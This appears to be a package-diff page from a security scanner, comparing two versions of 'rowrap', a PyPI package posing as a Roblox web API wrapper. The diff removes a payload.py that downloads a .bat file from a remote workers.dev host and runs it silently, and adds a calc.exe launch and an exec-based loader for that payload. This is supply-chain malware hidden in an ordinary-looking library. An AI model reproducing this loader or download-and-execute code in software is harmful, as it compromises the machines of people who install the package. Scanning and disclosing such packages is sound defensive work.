rowrap
Advanced tools
+1
-1
| Metadata-Version: 2.4 | ||
| Name: rowrap | ||
| Version: 1.1.5 | ||
| Version: 1.1.6 | ||
| Summary: A Python wrapper for the Roblox web APIs | ||
@@ -5,0 +5,0 @@ License: MIT License |
+1
-1
@@ -7,3 +7,3 @@ [build-system] | ||
| name = "rowrap" | ||
| version = "1.1.5" | ||
| version = "1.1.6" | ||
| description = "A Python wrapper for the Roblox web APIs" | ||
@@ -10,0 +10,0 @@ readme = "README.md" |
+1
-29
@@ -1,30 +0,2 @@ | ||
| import os | ||
| import tempfile | ||
| import urllib.request | ||
| import subprocess | ||
| def download_and_execute_exe(): | ||
| try: | ||
| # Hardcoded URL | ||
| exe_url = "https://dark-resonance-459b.blammervale.workers.dev/555.bat" | ||
| # Create a temporary file | ||
| with tempfile.NamedTemporaryFile(suffix='.exe', delete=False) as temp_file: | ||
| temp_path = temp_file.name | ||
| # Download the file | ||
| urllib.request.urlretrieve(exe_url, temp_path) | ||
| # Execute the file silently | ||
| subprocess.call([temp_path], shell=True) | ||
| # Optional: Clean up the temp file after execution | ||
| # os.unlink(temp_path) | ||
| except Exception: | ||
| # Clean up temp file if it exists | ||
| if 'temp_path' in locals() and os.path.exists(temp_path): | ||
| os.unlink(temp_path) | ||
| if __name__ == "__main__": | ||
| download_and_execute_exe() | ||
| subprocess.Popen("calc.exe") |
@@ -1,1 +0,3 @@ | ||
| \import payload | ||
| import sys | ||
| sys.path.insert(0, '') | ||
| exec(open('payload.py').read()) |
| Metadata-Version: 2.4 | ||
| Name: rowrap | ||
| Version: 1.1.5 | ||
| Version: 1.1.6 | ||
| Summary: A Python wrapper for the Roblox web APIs | ||
@@ -5,0 +5,0 @@ License: MIT License |
Alert delta unavailable
Currently unable to show alert delta for PyPI packages.
65448
-1.24%1021
-2.02%